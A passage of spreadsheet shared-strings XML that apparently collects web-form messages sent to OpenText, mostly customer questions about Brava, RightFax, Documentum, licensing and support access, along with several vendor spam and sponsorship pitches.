			&lt;/coverage&gt;_x000D_
		&lt;/coverages&gt;_x000D_
	   &lt;/location&gt;_x000D_
	   &lt;location&gt;_x000D_
		&lt;locationAddress1&gt;888 Toad Road&lt;/locationAddress1&gt;_x000D_
		&lt;locationAddress2&gt;Attn: Front Desk&lt;/locationAddress2&gt;_x000D_
		&lt;locationAddressCity&gt;Kitchener&lt;/locationAddressCity&gt;_x000D_
		&lt;locationAddressProv&gt;ON&lt;/locationAddressProv&gt;_x000D_
		&lt;locationAddressPC&gt;N3X 1X5&lt;/locationAddressPC&gt;_x000D_
		&lt;locationOccupancy&gt;OFFICE BLDG (10 Storeys or Less) - Multi Residences - TriPlex&lt;/locationOccupancy&gt;_x000D_
		&lt;locationConstruction&gt;Wood frame with steel roof&lt;/locationConstruction&gt;_x000D_
		&lt;coverages&gt;_x000D_
			&lt;coverage&gt;_x000D_
				&lt;coverageName&gt;COMMERCIAL BUILDING STANDARD FORM&lt;/coverageName</t>
  </si>
  <si>
    <t>We purchased Brava! Desktop DXP software, but logging into your opentext.com website keeps saying we have not activated "My Support" even though we have clicked through the e-mailed link several times over a 24-hour period.</t>
  </si>
  <si>
    <t>NEED TO PURCHASE FULL VERION OF BRAVA DWG VIEWER FOR WINDOWS 7.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,_x000D_
_x000D_
I have a Natural Language text processing technology business for sale, due to retirement, with know-how that might interest you._x000D_
One U.S. patent for artificial reasoning, U.S.8560305 B1, published on 15.10.2013, two other patents pending._x000D_
_x000D_
We have competitive technology for word disambiguation in context, parsing, content recognition, text attribution, classification, annotation, question answering, machine translation, spell-checking, etc._x000D_
_x000D_
Whom shall I contact to discuss possible M&amp;A?_x000D_
If you are interested for possible acquisition, please, contact me to make_x000D_
further arrangements._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Hristo Georgiev_x000D_
owner of Langsoft, Sprachlernmittel_x000D_
http://www.langsoft.ch_x000D_
P.S. Do not subscribe me, please! </t>
  </si>
  <si>
    <t>Looking for a Document Management solution as well as a product that ties into SAP for saving of invoices/quotes to PO's.</t>
  </si>
  <si>
    <t xml:space="preserve">UPADATE do Brava DWG, conforme mensagem recebida. Como Proceder?_x000D_
Texto: For the latest documentation updates, please be sure to visit our product page on the OpenText Knowledge Center:_x000D_
</t>
  </si>
  <si>
    <t>Hallo,_x000D_
wir würden gerne OpenText Brava! Reader bei uns im Unternehmen einsetzen._x000D_
Wir haben die frei verfügbare Version bereits getestet._x000D_
Bitte machen Sie mir eine Angebot für 10 Netzwerklizenzen._x000D_
Danke und freundliche Grüße_x000D_
Axel Vondermühl</t>
  </si>
  <si>
    <t>Need the PMC code to reinstall Gupta Team Developer on new surface PC.  When I log in to support to get my license keys It says I need to confirm my email.  I did and it still says this.  Also says my account does not have access to license keys.  I need this access.  Please contact me.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I was hoping to hear back from you. Did you get a chance to review my previous email?_x000D_
_x000D_
Kindly let me know your current email list requirements, so that I can get back to you with accordingly._x000D_
_x000D_
Awaiting your response._x000D_
_x000D_
Regards,_x000D_
Erica_x000D_
_x000D_
Disclaimer: This is an Marketing Act and a Promotional Email strictly based on the guidelines of CAN-SPAM Act 2008. We have found your email address through our marketing efforts on the web. If you find this email unsolicited, Please reply “UNSUBSCRIBE" and we will ensure that you do not receive any further promotional email from our end._x000D_
</t>
  </si>
  <si>
    <t>Rightfax requirement for one of our customers.</t>
  </si>
  <si>
    <t>Looking to propose a DAM solution to the marketing team. Need a demo and overview to evaluate the same.</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
_x000D_
Nous utilisons actuellement la version 3.0 de Streamserve (MOM), en lien avec notre ERP Movex (v11.3)._x000D_
_x000D_
Nous envisageons de faire évoluer notre plateforme StreamServe pour l'enrichir de certaines fonctionnalités, notamment pour la production d'étiquettes (datamax) et l'impression de QR code._x000D_
_x000D_
Est-il possible d'être mis en relation avec une personne d'OpenText, ou d'avoir une liste des revendeurs basés en France ?_x000D_
_x000D_
Cordialement,_x000D_
Sébastien TOUQUET </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
we are evaluating your software for a primary customer which need a socks proxy for a FTP server._x000D_
_x000D_
We need to understand if this Client can run as a service, so the Client can be restarted at server reboot._x000D_
_x000D_
Thanks_x000D_
_x000D_
Angelo</t>
  </si>
  <si>
    <t>Dear Sir or Madam,_x000D_
_x000D_
we're interested in using Brava! Desktop DXP with a Seat Network license, but require more information as how this license model works. Our users are working randomized on multiple terminal server (each user connects to a different server on a weekly basis). Does your license model work in this environment?_x000D_
_x000D_
Sincerely,_x000D_
Marc Roffmann_x000D_
IT Integration &amp; Operations_x000D_
Team Directory Services_x000D_
ING-DiBa AG</t>
  </si>
  <si>
    <t>Hi Opentext, Please can you enable me for full support access.  I'd like to find out about Opentext designer.  Thanks and kind regards,  Jeremy Fisher.</t>
  </si>
  <si>
    <t>I have tested you software 'Free DWG Viewer' to display AutoCad drawings and it works fine._x000D_
Is it possible to use the program to 'batch-print' (with a DOS-command) a drawing?</t>
  </si>
  <si>
    <t>Sir seeking suitable openings in Software Manual Testing to my bro. R A Krishnan - having 10 years experience - resigned from Tech Mahindra Ltd, Chennai in Nov.2013 because of personal reasons / problems - not in work from Nov.2013 and do not have Knowledge / Experience in Mobile / Web Testing and in advanced tools like Selenium, Load Runner etc.,Hope my brother will get an early favorable reply and fixed in the job.</t>
  </si>
  <si>
    <t>I want to request for a quotation for the Fax Server. Thank you.</t>
  </si>
  <si>
    <t>We used Fujitsu 'Paperstream CApture' scanning software. can opentext connect with the scanning software.</t>
  </si>
  <si>
    <t>we are migrat5ing our data center to a VPC in AWS.  We want to know what support RightFax has for running the servers in a VPC at AWS.  we currently run it on a VM machine on prim.</t>
  </si>
  <si>
    <t>Please reach out to me ASAP regarding your document management product.</t>
  </si>
  <si>
    <t>I would like to know how much does it cost to sign up with OpenText FirstClass. I couldn't find it on the website._x000D_
Thank you._x000D_
Luiz</t>
  </si>
  <si>
    <t xml:space="preserve">We had an employee that was responsible for the support of Opentext with EPS who is no longer with our company.  I would like to contact someone to find out how to transfer the contact information to a different IT Support person.    I have a couple other questions so if I could get someone to contact me that would be great. </t>
  </si>
  <si>
    <t>Draegerwerk AG  (parent company) is evaluating VIMS solution and I wanted to understand the capabilities, user experience.  Looking for demo and additional information as part of search for improved accounts payable efficiencies.</t>
  </si>
  <si>
    <t>We are looking for a data management software that is connected to various people across different location. I am interested to know more about E room software. I used to use it for in my previous organization. Could you please send me more details on this.</t>
  </si>
  <si>
    <t>Dear Sir/Madam_x000D_
_x000D_
We are a small UK based start up offering business analytics to a range of SMEs. We are looking for a data analytics software package that meets our needs and are currently in the process of getting some basic information from various vendors._x000D_
_x000D_
Could you please provide a brief overview of your product and answer the relevant queries below?  We are currently getting a feel for what is available and would therefore prefer just some basic information for now, but please feel free to provide some further information about your product separately if desired._x000D_
_x000D_
- Is the product cloud based, virtual appliance or software?_x000D_
- What are the minimum requirements?_x000D_
- What firewall changes are required?_x000D_
- Does the software export any data?_x000D_
- Does historical data get stored by the software?_x000D_
- How is data kept secure?_x000D_
- How is the product licensed and priced?_x000D_
- Is it possible to re-brand?_x000D_
- Can the product analyse real time data?_x000D_
- What is the compatibility with various file types/file sharing sites?_x000D_
- What technical support is available?_x000D_
- Is any user training provided/included?_x000D_
- Do you have a free trial period - if so how long?_x000D_
_x000D_
We would be happy to have a brief call at a later date if your product matches our needs._x000D_
_x000D_
Best Regards_x000D_
_x000D_
Chris Ashton &amp; Tom Cole</t>
  </si>
  <si>
    <t>Hi,_x000D_
Is it possible to send us a formal 2-year license quote for Sitecore® Experience Platform™ (XP) for non-profit organization? Thanks very much.</t>
  </si>
  <si>
    <t>Exploring vendors for new ECM system</t>
  </si>
  <si>
    <t>I need a low-volume, web-based app for creating ASN (856) transactions to be sent to one of your existing customers.  Thanks in advance.  Best regards, Kevin</t>
  </si>
  <si>
    <t>When I try to open a file I receive this error message..._x000D_
_x000D_
Invalid license._x000D_
Unable to load files._x000D_
_x000D_
An update is required for Brava! Reader._x000D_
Please contact your supplier for an update._x000D_
_x000D_
I uninstalled my old brava reader and downloaded new one from the opentext website but i still get the same error message. Please help.</t>
  </si>
  <si>
    <t xml:space="preserve">Evaluating CCM solution for an immediate need. Request for Demo and potential POC for vendor evaluation. </t>
  </si>
  <si>
    <t>Interesse em produtos e soluções de Document Managemet para o setor público. Especialmente na plataforma Documentum.</t>
  </si>
  <si>
    <t>I'm curious of costs associated with OpenText to handle on-boarding of a new EDI partner.  We have a need to have 850 and 810 maps with the EDI partner, as well as any setup in the VAN.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Computer Recycling Team, Inc. would like to introduce our Buy Back Program for Companies seeking to get cash for large amounts of decommissioned IT equipment resulting from an upgrade or liquidation, we can help with recovery costs. Please see our pricing schedule below:_x000D_
_x000D_
LCD's 17" and above no broken screens $3.00 each_x000D_
Computers - $0.13/lb_x000D_
Other e-waste (keyboards, mice, peripherals and cables) - $0.05/lb_x000D_
Printers - $0.03/lb_x000D_
TV's &amp; CRT Monitors - $0.05/lb_x000D_
UPS backup batteries - $0.10/lb</t>
  </si>
  <si>
    <t>Catalogue access</t>
  </si>
  <si>
    <t>I am researching an upgrade cost to existing TeamSite instance version TeamSite 7.3.2 to the current version of TeamSite required by a project. We currently have 1 instance of LiveSite and 2 instances of OpenDeploy. I require a quote to upgrade these instances. If we can proceed by email at first I would greatly appreciate it.</t>
  </si>
  <si>
    <t>We are buying Rightfax License through one of our Vendor but they not sure of how to aquire the software and spec's I need to create my server. Can you help?</t>
  </si>
  <si>
    <t>Need a quote for software</t>
  </si>
  <si>
    <t>ECM solutions integrated with SAP ERP</t>
  </si>
  <si>
    <t>tornar-se um parceiro</t>
  </si>
  <si>
    <t>Looking for information regarding the RightFax client fp3 sr1, I cannot seem to find anything on your website, only 3rd party websites. _x000D_
_x000D_
I am also waiting on the registration email, been about an hour, how long does it normally take?</t>
  </si>
  <si>
    <t>We have three computers, can i put brava desktop on all three for $65</t>
  </si>
  <si>
    <t>The Company Clinica Girassol have a valide contrat ?</t>
  </si>
  <si>
    <t>Good Day,_x000D_
I would like to know if Brava Desktop CXL can be installed on a Window 10 64bit OS machine._x000D_
_x000D_
Moreover I would like to know if the "markups" can be saved on the local drive and if they can be edited in cronological subsequent working sessions._x000D_
_x000D_
Thank you._x000D_
_x000D_
R.Mantero.</t>
  </si>
  <si>
    <t>We have downloaded the new version of Brava Reader for our users however they are all having issues when opening files.  The program either crashes or times out randomly when trying to open files.  Is there a resolution?</t>
  </si>
  <si>
    <t>Brava Reader "Invalid License" issues.  Can't find resolution to make software usable.  Please help.</t>
  </si>
  <si>
    <t>We are looking for Brava for documentum, but to use from an IIS application is it possible?_x000D_
The client application is a custom application, .net, which runs from an IIS, which uses documentum .Net dlls._x000D_
Thank you very much_x000D_
Best regards</t>
  </si>
  <si>
    <t xml:space="preserve">I'm interested in the Gupta Report Builder 6.0 or 6.2._x000D_
_x000D_
Can you send me information and price?_x000D_
_x000D_
Best regards,_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Manager,_x000D_
_x000D_
Greetings from Clinical Research 2017!_x000D_
_x000D_
Conference Series LLC cordially invites you to the “3rd International Conference on Advanced Clinical Research and Clinical Trials” going to be held from September 20-21, 2017 in Dublin, Ireland._x000D_
_x000D_
The theme of the conference is “Exploring Innovations in Clinical Research and Clinical Trials”. _x000D_
_x000D_
The conference provides an exceptional opportunity to promote your organization and would be an excellent chance to meet colleagues, to exchange knowledge and experience, and to extend your list of contacts._x000D_
_x000D_
This event will provide a broad ranging platform for informative and interactive discussions with contributions by recognized experts from:_x000D_
•	Industry_x000D_
•	Associations _x000D_
•	Academia_x000D_
Clinical Research 2017 is offering Exhibitor opportunity at the venue who intends to showcase their new and emerging technologies._x000D_
_x000D_
Exhibitor Benefits:_x000D_
•	One complimentary congress registration _x000D_
•	One complimentary speaker opportunity_x000D_
•	An opportunity to sponsor 1 Poster Presentation Award_x000D_
•	One exhibit booth (Size-3X3 sqm) _x000D_
•	Logo recognition on congress website sponsorship page_x000D_
•	Verbal recognition during Opening and Closing Ceremony_x000D_
•	One page add in conference souvenir  _x000D_
•	One insert provided by the exhibitor in the congress delegate bags _x000D_
_x000D_
The organizing committee would like to invite you and your organization to be a part of conference as an Exhibitor. _x000D_
_x000D_
For more information about sponsor/Exhibitor opportunity, Please visit http://clinicalresearch.pharmaceuticalconferences.com/_x000D_
_x000D_
For more information on how your organization could benefit from this event and to discuss the full range of lead generating, networking and branding opportunities that exist, feel free to contact the undersigned._x000D_
_x000D_
We look forward to have your valuable association with our conference._x000D_
_x000D_
Awaiting your response_x000D_
_x000D_
Thanks &amp; Regards_x000D_
Anvesh Bradley | Program Manager_x000D_
Clinical Research 2017_x000D_
Direct: (702) 508-5200 _x000D_
Customer Service: </t>
  </si>
  <si>
    <t>I am attempting to find the PDF files for how to use gupta report builder. It seems as though ALL of the "support.guptatechnologies.com" pages on that domain no longer are accessible, i know i used them before but i never downloaded the pdf. I really need access to these._x000D_
_x000D_
Here are the pdfs i need https://support.guptatechnologies.com/Docs/ReportBuilder/report.pdf_x000D_
_x000D_
https://support.guptatechnologies.com/Docs/ReportBuilder/WhitePapers/ReportBuilderGuideToCreatingReports.pdf</t>
  </si>
  <si>
    <t>We need to URGENTLY get a quotation for the deployment of Opentext ECM Solution (Document Management) at Office of Surveyor General, Lagos State, Nigeria.</t>
  </si>
  <si>
    <t>We have several licenses of Brava Desktop that need the maintenance contracts renewed._x000D_
_x000D_
Can you provide pricing to bring these up to date and could we group all the licenses together so they expire at the same time?_x000D_
_x000D_
Contract IDs:_x000D_
C00232954_x000D_
C00233239_x000D_
C00229770_x000D_
_x000D_
We should also have some licenses in our Highland Indiana office, can you roll them in as well?</t>
  </si>
  <si>
    <t>Dear all i am interested in knowing your contract center solution for a possible reselling program._x000D_
_x000D_
Kind regards._x000D_
_x000D_
Nuno Levy</t>
  </si>
  <si>
    <t>I did not receive the link for download after registering twice. Please, send it to me. Thank you!</t>
  </si>
  <si>
    <t>I have some questions regarding the functionality provided by the Enterprise Content Management system.  I would like to see if this application meets the business needs of FHLBI.</t>
  </si>
  <si>
    <t xml:space="preserve">We are keen in adding fax to our cloud offering. Do you have reseller model or support white label ling </t>
  </si>
  <si>
    <t>Support login details.</t>
  </si>
  <si>
    <t xml:space="preserve">I need a price quote for IP Fax Server: with the following Specs:_x000D_
General Requirements	Support for 50 FoIP Channels per  instance (Physical or Virtual) and up to eight instances on the cluster (400 Channels)_x000D_
	Support Ultimate users usage_x000D_
	Support alarm via e-mail and SNMP_x000D_
	Spplication support from any browser, any e-mail client, Cisco Jabber Desktop_x000D_
	Ready for PDF, JPG, Doc(x), XLS(x), RTF, BMP, J{EG, GIF, TIFF_x000D_
	Embedded reporting tool or monitor fax transmission and fax channel use_x000D_
	Support for multifunction printer allowing for scan e-mail fanctionality_x000D_
	Support any e-mail server using SMTP(s), IMAP(s) or POP3(s) both on premises (Exchange, Lotus etc…) and the Cloud (Office365, Gmail, etc…)_x000D_
	Support for Globalized dial plan (E.164) for outgoing Faxes_x000D_
	Native Support for SIP and H323_x000D_
	Support for MultiClusters_x000D_
	Support for Arabic Language_x000D_
Users Provisioning	Support manual or automatic user provisioning from Cisco Unified communication Manager, Microsoft AD, LDAP/Opent.DAP systems and CSV files_x000D_
High Availabiltiy	Support high availability in an active-active way with Business Continuity, either on same DC or different DC (Disaster Recovery)_x000D_
Incoming Faxes	Support incoming Fax to e-mail, Fax to Web, Gadget for Jabber Desktop for Everyone or Full Edition_x000D_
	Support for Fax mobile app for IOS and Android devices_x000D_
	Support for direct print on MFP-Network printers_x000D_
	Support for group and personal Fax number_x000D_
Outgoing Faxes	Support for Fax to e-mail, Fax to Web, Print to Fax (from any document or using modem Multifunction printers), Scan to Fax, Gadget for Jabber Desktop for Everyone or Full Edition_x000D_
	Support for mobile app for IOS and Android devices for Incoming and Outgoing Faxes_x000D_
	Support for MFP-Network printers_x000D_
	Support forpersonal and group Fax boxes to share while sending faxes_x000D_
Other Supported Functionalities	MFP and Digital sender support_x000D_
	Print Incoming Faxes on Network Printers_x000D_
	Copy Faxes on External Storage (NAS)_x000D_
	Outgoing for Routing based </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
We are interested to know if you have in Romania vendors/partners that are qualified OpenText Partners and able to provide on-site support on Bucharest for the following:_x000D_
-	standard support and maintenance for OpenText Right Fax for the periods and products as specified below:_x000D_
o	SUID: #93105-12135 RightFax 10.6  2Chanels SR140_x000D_
o	Business hours coverage: Monday to Friday 8am to 7PM_x000D_
o	Access to the open Text Online Assist support portal_x000D_
_x000D_
Thank you,_x000D_
</t>
  </si>
  <si>
    <t>The free viewer is asking for an update please help me update it.  I am also trying to install this free viewer on rob@csengineering.co.uk but you don't seem to reply to our emails.</t>
  </si>
  <si>
    <t xml:space="preserve">Hallo,_x000D_
das Fax eines unserer Empfänger kommt seit drei Monaten nicht bei ihm an. _x000D_
Seine Mitgliedsnummer: 569619	_x000D_
Seine Fax-Nummer: 05245922719_x000D_
_x000D_
Sein Fax hat er überprüft. Können Sie bitte prüfen, woran es liegen kann._x000D_
_x000D_
Vielen Dank und Grüße_x000D_
Katrin Poppe_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for more challenging opportunities , such that I would be allowed to leverage and be able to put to use /contribute to greater than 80 % of my skills and capabilities towards the benefit of an organisation of your stature and qualities, before it is too late. </t>
  </si>
  <si>
    <t>Sir,_x000D_
_x000D_
I am the founder of uSchola Inc, a federally incorporated startup organization based in Waterloo, Ontario, Canada._x000D_
_x000D_
We have positioned ourselves as the "LinkedIn" of student community around the world._x000D_
_x000D_
Born and brought up in a remote village in a developing country (India), I am motivated by the immense_x000D_
opporunity available to the world in the form of untapped human potential in the undeveloped and developing _x000D_
countries that, if utilized properly, could take the current world to a new and better level._x000D_
_x000D_
That motivation is the driving force behind the Vision and Mission of uschola_x000D_
_x000D_
uSchola's Vision:_x000D_
"Inspire and empower the next generation to build a world of equal opportunity for all_x000D_
by reducing the knowledge differential among students from different parts of the world _x000D_
and integrating the underprivileged to the mainstream"_x000D_
_x000D_
uSchola's Mission:_x000D_
"Build an exclusive platform where students from geographically, ethnically and economically _x000D_
diverse backgrounds can congregate leading to the free flow of knowledge and information _x000D_
across all barriers and thus fostering the notion of inclusiveness among the next generation"_x000D_
_x000D_
uSchola delivers a number of value added services targeting the student community. _x000D_
The services are delivered through web (http://www.uschola.com) and mobile platforms_x000D_
_x000D_
As part of helping the student community, we are looking for Student Scholarships/Sponsorships from major corporations._x000D_
_x000D_
Your support in this regard will help us a long way in our journey to our vision._x000D_
_x000D_
I am happy to provide any additional information that you may need._x000D_
_x000D_
Looking forward to your response._x000D_
_x000D_
Yours sincerely,_x000D_
Sunil Maniyappan_x000D_
Founder, uSchola Inc</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I am writing in hopes of finding the appropriate person who handles Marketing._x000D_
_x000D_
Would you be interested in reaching out to your target markets to generate new business partnerships?_x000D_
_x000D_
We can help you reach CEO, CFO, CIO, CTO, CMO, VP level, Director Level, IT Directors, Engineers, Marketing Professionals etc., from  Medical, Software Development, Automation, Manufacturing, Business Management Consulting and Contractors, Management Consulting across the US, UK, Canada, Australia, New Zealand and Singapore._x000D_
_x000D_
Kindly fill in your requirement below and we will revert back to you with relevant details at the earliest._x000D_
_x000D_
Target Industry:	  _x000D_
Target Job Title:  _x000D_
Target Geography:  _x000D_
_x000D_
Please feel free to share if you have any specific target audience I will send over a sample free of cost for your perusal._x000D_
_x000D_
Regards,_x000D_
Lee Johnson_x000D_
Marketing Manager_x000D_
www.aculides.com_x000D_
</t>
  </si>
  <si>
    <t>Please verify compatibility with Update Rollup 17 for Exchange Server 2010 SP3 and OpenText Email Archiving for Microsoft Exchange version 10.5 SP1.</t>
  </si>
  <si>
    <t>Evaluation of OpenText for our requirements._x000D_
A product demo based on meeting requirements</t>
  </si>
  <si>
    <t xml:space="preserve">I need help with HostExplorer 14.0.0.353 on Windows 2016 R2. I have a 3270 profile that is configured to use SSL. Each morning when I come in, the test system has the Use SSL flag turned off, and connectivity has failed. When I flip this switch back on, it is able to reconnect. Nobody is changing this value, and I think the profile manager may be turning off the flag when multiple connect failures occur during the night when the LPAR is taken down for maintenance. </t>
  </si>
  <si>
    <t>Hello!_x000D_
_x000D_
My name is Allan Luik - I am one of the organizers at User Experience Professionals Association. I am reaching out to you because our international conference will be held in Toronto this year and we thought folks at Open Text would like to know about it. This multi day conference (June 5-8th) will bring together design and research talent, companies and organizations from all over the world (last year in Seattle we had attendees from over 30 countries). Would you be interested in being involved as a sponsor or exhibitor?_x000D_
_x000D_
There are many benefits, including:_x000D_
_x000D_
-  Marketing your company throughout all our materials, decorations and media_x000D_
-  Exhibit booths to engage with potential clients and employees_x000D_
-  Discounted conference tickets for your attendees_x000D_
-  Cutting edge knowledge shared by top professionals_x000D_
_x000D_
Please have a look at our conference website[1] and our sponsorship prospectus[2] and let us know if you have any questions._x000D_
_x000D_
Thanks!_x000D_
_x000D_
Allan Luik_x000D_
UXPA 2017 Conference Chair_x000D_
sponsorship2017@uxpa.org_x000D_
_x000D_
Links:_x000D_
------_x000D_
[1] http://uxpa2017.org/_x000D_
[2] http://www.mycdevents.com/UXPA/wp-content/uploads/2017/03/UXPA-2017-Prospectus.pdf</t>
  </si>
  <si>
    <t>Looking for more info and possibly a demo on Documentum.</t>
  </si>
  <si>
    <t>Hello Opentext,_x000D_
_x000D_
I hope you are doing well. I got your email id from Google._x000D_
_x000D_
My name is Ashleigh Michelsen and I am outreach executive of The Contributors Org. We provide guest posting services. I would like to inform you that, We are now working for the most popular weblogs like behance / cafemom / HR / Martindale / Lerablog / archielovers and much more. _x000D_
_x000D_
If there is any opportunity for me, please feel free to get in touch._x000D_
_x000D_
Thanks,_x000D_
Ashleigh</t>
  </si>
  <si>
    <t>TRYING TO UPLOAD .CSV FILE TO CATALOG AND GETTING ERROR</t>
  </si>
  <si>
    <t>Cotação</t>
  </si>
  <si>
    <t xml:space="preserve">I'd like to know if rightfax is supported on exchange 2016.  </t>
  </si>
  <si>
    <t>Brava reader free to windows seven</t>
  </si>
  <si>
    <t>I filled out the required fields for the free download of Brava! Reader and I have not received the email with the link.</t>
  </si>
  <si>
    <t>Information on RightFax integration on new system to fax document and information.</t>
  </si>
  <si>
    <t>Need to buy Vista Plus License</t>
  </si>
  <si>
    <t>WOuld like to know more about tempo box, if we can install it on our company server and the price for a SME</t>
  </si>
  <si>
    <t>Not able to open a ticket for obtaining demo license key._x000D_
Kindly help-in early resolution.</t>
  </si>
  <si>
    <t>I wish to learn if training for Documentum may be available for small company, such as my consulting operation.  I develop reports for clinical development during new drug and device development, where eventual publishing step involves Documentum.  Being a small company, we do not have a license for Document.  However, various clients/sponsors have the capability, and we are often required to align our work with Documentum.  I am interested in finding out if you may offer potential train opportunity so that increased proficiency may be developed.  I will appreciate a response by email [RNDSSS@gmail.com].  Thank you._x000D_
Best regards,_x000D_
Mahadev Patel_x000D_
Consultant, Regulatory Medical Writing</t>
  </si>
  <si>
    <t xml:space="preserve">trying to open up GXS Catalogue.  I have left message and also this is my second request for someone to call me so i can open an account.  </t>
  </si>
  <si>
    <t>Bonjour, _x000D_
J'ai besoin d'identifier vos partenaires locaux (Maroc) pour les consulter  au sujet de l'acquisition de la dernière version de la solution RightFax._x000D_
Merci de me communiquer la liste de vos partenaires marocains._x000D_
Salutations.</t>
  </si>
  <si>
    <t xml:space="preserve">Will this software require renewal every year? Is that why the $10.00 maintenance is included?  Or can I just buy the software and forgo any updates.  I only use it for one purpose, to get square footages.  Thank you </t>
  </si>
  <si>
    <t>I would like to know how to buy Brava Reader so as not to continually update it for one of my users.</t>
  </si>
  <si>
    <t>Unable to checkout Xml in webtop receiving error, [DM_STORAGE_E_BAD_TICKET]error:  "Use of invalid ticket for storage object with name additional_xdoc_filestore_2; storage may be improperly configured.</t>
  </si>
  <si>
    <t>unable to install brava reader, throwing an exception _x000D_
"Windows version prior to Window 10 require windows update KB2999226 for Universal CRT before using this product"_x000D_
Any kind of update will greatly appreciated._x000D_
_x000D_
Thanks &amp; Regards,_x000D_
Surendra</t>
  </si>
  <si>
    <t xml:space="preserve">Question on Redact-it Desktop version.  Is the resulting PDF a searchable document?  </t>
  </si>
  <si>
    <t xml:space="preserve">Looking to implement a new document retention policy and ECM solution. </t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
aufgrund einer aktuellen Kundenanfrage wende ich mich an Sie. Wir müssen ASAP (diese Woche) in Erfahrung bringen, ob und welche HP Geräte an Ihr "OpenText xECM" angebunden werden können. Welche Voraussetzungen müssen geschaffen werden? Ich verstehe Ihre Software so, dass sie mit "OCR" erstelle Dokumente analysiert, kategorisieren und zuweisen kann. Natürlich werden noch weitere Funktionen geboten._x000D_
_x000D_
Über ein klärendes Paper oder Gespräch würde ich mich sehr freuen._x000D_
_x000D_
Mit den besten Grüßen_x000D_
Karsten Janotta_x000D_
</t>
  </si>
  <si>
    <t>EKW 7000572608 - Bitte um die Erstellung eines Angebotes für Opentext Licensing - IXOS, eine Lizenz</t>
  </si>
  <si>
    <t xml:space="preserve">Documentum App Extender and WebExtender optimization. </t>
  </si>
  <si>
    <t xml:space="preserve">informing you about an issue with the first class go app for iphones ios. we had an ios update 2 weeks ago for ios 10.3.1. since then and even after redownloading the app. notifications for new email are not being "pushed" or shown through the app notification settings. logging in and all the other functions are working fine. just the notifications are not with the most recent ios update. thank you for your swift service. </t>
  </si>
  <si>
    <t>My Support Access for partner</t>
  </si>
  <si>
    <t>Unable to Login, Account disabled/Locked, kindly help to Enable the User ID (mandsmerch@kmohan.com) is the id _x000D_
Thanks - Vinod</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
_x000D_
Nous sommes la société Openserv Madagascar, spécialisée dans le domaine de l’externalisation, notamment la mise à jour de base de données, et la qualification de fichiers._x000D_
Nous vous proposons 7 pôles de services à des prix défiant toute concurrence pour une qualité de service irréprochable :_x000D_
_x000D_
- Gestion de la relation clients (Appels, Email, SMS) ;_x000D_
- Mise à jour de base de données ;_x000D_
- Qualification de fichiers (en BtoB, BtoC);_x000D_
- Détection de projets ;_x000D_
-Transcription audio et vidéo (Conférence, Réunion) ;_x000D_
- Prise de rendez-vous ;_x000D_
- Enquête de satisfaction._x000D_
Sérieuse et professionnelle notre équipe possède des expériences individuelles de plus de 5 ans dans ces domaines dans différentes sociétés spécialisées dans l’externalisation, et nous souhaitons vous proposer nos services en tant que prestataire._x000D_
_x000D_
Vous pouvez également visiter notre site https://openserv261.wixsite.com/openserv261_x000D_
Nous restons à votre disposition pour plus d'informations._x000D_
_x000D_
Bien cordialement,_x000D_
Léa TARCILE_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Team,_x000D_
We are, Citi Application Readiness Team, need your assistance in order to gather info about below application compatibility and support for Win 10 as part of Window 10 Readiness initiative. CITI Bank has been using below “Metastorm Provision v6.3”  software products currently on Win 7 operating system and Citrix 6.5 ._x000D_
</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Je voudrais savoir si Execute360 10.0 est compatible Windows Server 2012 R2 ? Windows Server 2016 ?_x000D_
Si non, à partir de quelle version Execute 360 est compatible avec Windows Server 2012 R2 ? Windows Server 2016 ?_x000D_
_x000D_
Cordialement,_x000D_
_x000D_
Nicolas Kremer</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
We are planning a DMS integration before the end of this year. At the moment we are busy with searching for a vendor(s) which can fulfill our requirements. I would love to share our requirements with you, and if feasible schedule a demo on short term. Looking forward to meet you._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Ruud van Riemsdijk </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Hi,_x000D_
_x000D_
Would you be interested to acquire permission based email list of business-intelligence-software Users? Also, would you be interested in Software Distributors and Re sellers?  _x000D_
_x000D_
We have a ready to deliver verified email list of 180,000+ business-intelligence-software Users from USA, UK, Canada, Australia, Europe and rest of the World._x000D_
_x000D_
Our list especially for you:-_x000D_
List of contacts who are looking for software which take information from one or more data sources and design applications and dynamic business reports for personalized insights. _x000D_
_x000D_
Data Fields Includes : - Company Name, Contact Name, Job Title, Email Address, Telephone Number, Fax Number, Physical Address, Zip Code, Website, Technology type etc. _x000D_
_x000D_
Let me know your interest, so that we could discuss further._x000D_
_x000D_
Regards_x000D_
Erica_x000D_
_x000D_
Disclaimer - The contents of this email message and any attachments are intended solely for the addressee(s) and may contain confidential and/or privileged information and may be legally protected from_x000D_
disclosure. If you are not the intended recipient of this message or their agent, or if this message has been addressed to you in error, please immediately alert the sender by reply email with "unsubscribe" or "delete" in subject line and then delete this message and any attachments. If you are not the intended recipient, you are hereby notified that any use, dissemination, copying, or storage of this message or its attachments is strictly prohibited._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
mit einem Schreiben vom 31.01 teilten Sie uns eine neue Bankverbindung mit:_x000D_
GB88CITI18500817495781_x000D_
Da usn bis dato keine neue Rechnung von Ihnen vorliegt, kontnen wir den Abgleich noch nicht vornehmen._x000D_
Von daher bitte ich um Bestätigung dieser Änderung._x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
we use brava reader free edition for only viewing tiff images._x000D_
After we applied last updates that to unlock time restriction, we have zoom problem. _x000D_
